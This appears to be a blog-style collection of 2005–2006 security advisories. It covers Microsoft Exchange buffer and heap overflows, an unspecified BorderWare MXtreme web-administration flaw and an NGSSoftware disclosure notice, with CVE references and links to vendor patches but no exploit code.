http://www.microsoft.com/downloads/details.aspx?FamilyId=8B98A5FE-7A26-45F0-8D28-C9618FA7A458&displaylang=en

Microsoft Office X for Mac:
http://www.microsoft.com/mac/

Microsoft Office 2004 for Mac:
http://www.microsoft.com/mac/

The fixes in this bulletin replace some fixes in MS04-033, MS05-012, MS05-035, MS06-003, and MS06-010.

A restart may be required.

The vendor's advisory is available at:

http://www.microsoft.com/technet/security/Bulletin/MS06-012.mspx
Vendor URL: www.microsoft.com/technet/security/Bulletin/MS06-012.mspx
Cause: Boundary error
Underlying OS: UNIX (OS X), Windows (2000), Windows (2003), Windows (XP)


Saturday, March 18, 2006

BorderWare MXtreme Mail Firewall Web Administration Unspecified Issue

OSVDB ID: 23939
Disclosure Date: Mar 17, 2006

Description:

BorderWare MXtreme contains a flaw related to the web administration interface. No further details have been provided.

Vulnerability Classification:
Remote/Network Access Required
Unknown Attack Type
Loss Unknown
Exploit Unavailable
Verified
Web Related

Products:
BorderWare Technologies Inc. MXtreme Mail Firewall 5.0
BorderWare Technologies Inc. MXtreme Mail Firewall 6.0

Solution:

Apply the patch provided by BorderWare, as it has been reported to fix this vulnerability. In addition, the vendor recommends disabling HTTP/HTTPS login access until patches can be applied.

External References:
CVE ID: 2006-1254
National Vulnerability Database: CVE-2006-1254
Bugtraq ID: 17140
Secunia Advisory ID: 19223
Security Tracker: 1015787
FrSIRT Advisory: ADV-2006-0972

Credit:

OSVDB does not have information on who discovered this vulnerability. If you have credit information please send it to OSVDB Moderators


Thursday, January 12, 2006

Execution of arbitrary code on Microsoft Exchange Server

From: NGSSoftware Insight Security Research (mark at ngssoftware . com)
Date: Tue Jan 10 2006 - 16:49:03 CST
John Heasman and Mark Litchfield of NGSSoftware have discovered a critical vulnerability affecting Microsoft Exchange. The vulnerable versions include:

Microsoft Exchange Server 5.0 Service Pack 2
Microsoft Exchange Server 5.5 Service Pack 4
Microsoft Exchange 2000 Server Service Pack 3 with the Post-Service Pack 3 Update Rollup of August 2004

Microsoft Exchange Server 2003 Service Pack 1 and Microsoft Exchange Server 2003 Service Pack 2 are *not* affected.


The vulnerability potentially allows execution of arbitrary code when the Microsoft Exchange Server Information Store processes a specially crafted email message.


The flaw has now been addressed and patches are available from:
http://www.microsoft.com/technet/security/Bulletin/MS06-003.mspx


NGSSoftware are going to withhold details of this flaw for three months. Full details will be published on the 10th April 2006. This three month window will allow system administrators the time needed to obtain the patch before the details are released to the general public. This reflects NGSSoftware's approach to responsible disclosure.

http://www.ngssoftware.com/disclosure.pdf


NGSSoftware Insight Security Research
http://www.ngssoftware.com
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

Mark Litchfield
www.ngssoftware.com
Tel: +44 208 40 100 70
Fax: +44 208 40 100 76
Cell: +1 253 414 4749


Tuesday, October 11, 2005

Microsoft Exchange Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1015038
SecurityTracker URL: http://securitytracker.com/id?1015038
CVE Reference: CAN-2005-1987
Date: Oct 11 2005
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Microsoft Security Advisory
Version(s): Microsoft Exchange 2000 Server SP3
Description: A vulnerability was reported in Microsoft Exchange in the Collaboration Data Objects component. A remote user can execute arbitrary code on the target system.

The Collaboration Data Objects (CDO) COM component contains a buffer overflow. A remote user can supply a specially crafted message to be processed by CDOSYS or CDOEX to trigger a buffer overflow and execute arbitrary code on the target system. SMTP can be used as an attack vector.

Microsoft Windows is also affected.

The vendor credits Gary O'Leary-Steele of Sec-1 with reporting this vulnerability.
Impact: A remote user can execute arbitrary code on the target system.
Solution: The vendor has issued the following fixes:

Microsoft Windows 2000 Service Pack 4:

http://www.microsoft.com/downloads/details.aspx?FamilyId=AE0BA6D7-37AF-46E8-9E25-AB63883FA944

Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?FamilyId=E0DAF2D1-656C-4580-94C1-8AB009B4AD4F

Microsoft Windows XP Professional x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=D389EF4D-583D-41C0-9081-844D348F3817

Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?FamilyId=1BC06799-B9F5-416F-8965-DC0E07A24A29

Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems:

http://www.microsoft.com/downloads/details.aspx?FamilyId=956FFD90-60AF-4296-8765-F0A17A77DB77

Microsoft Windows Server 2003 x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=5504C410-CDCB-4826-B002-DBA0E3A402A4

Microsoft Exchange 2000 Server Service Pack 3 with the Exchange 2000 Post-Service Pack 3 Update Rollup of August 2004:

http://www.microsoft.com/downloads/details.aspx?FamilyId=60FD0DDC-04B7-4879-930B-53375823CD51

A restart is not required.
Vendor URL: www.microsoft.com/technet/security/Bulletin/MS05-048.mspx
Cause: Boundary error
Underlying OS: Windows (2000), Windows (2003), Windows (XP)


Thursday, April 28, 2005

Microsoft Exchange Heap Overflow in Processing Extended SMTP Verb Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1013687
SecurityTracker URL: http://securitytracker.com/id?1013687
CVE Reference: CAN-2005-0560
Date: Apr 12 2005
Impact: Execution of arbitrary code via network, Root access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Microsoft Security Bulletin
Version(s): 2000 SP3, 2003, 2003 SP1
Description: A buffer overflow vulnerability was reported in Microsoft Exchange. A remote user can execute arbitrary code on the target system.

A remote user can connect to the Exchange SMTP service and supply a specially crafted extended SMTP verb to trigger a heap overflow. Arbitrary code will be executed with System privileges.

On Exchange 2003, authentication is required by default before the specific extended SMTP verb can be supplied. On Exchange 2000, no authentication is required.

The vendor credits Mark Dowd and Ben Layer of ISS X-Force with reporting this vulnerability.
Impact: A remote user can execute arbitrary code on the target system with System level privileges.
Solution: The vendor has issued the following fixes:

Microsoft Exchange 2000 Server Service Pack 3:

http://www.microsoft.com/downloads/details.aspx?FamilyId=2A2AF17E-2E4A-4479-8AC9-B5544EA0BD66

Microsoft Exchange Server 2003:

http://www.microsoft.com/downloads/details.aspx?FamilyId=97F409EB-C8D0-4C94-A67B-5945E26C9267

Microsoft Exchange Server 2003 Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?FamilyId=35BCE74A-E84A-4035-BF18-196368F032CC

A restart is not required if all applications are closed prior to installation. The security update will restart the IIS, SMTP, and the Exchange Server Information Store Service. The File Transfer Protocol (FTP) and Network News Transfer Protocol (NNTP) services will also be affected.
Vendor URL: www.microsoft.com/technet/security/Bulletin/MS05-021.mspx
Cause: Boundary error
Underlying OS: Windows (2000), Windows (2003), Windows (XP)
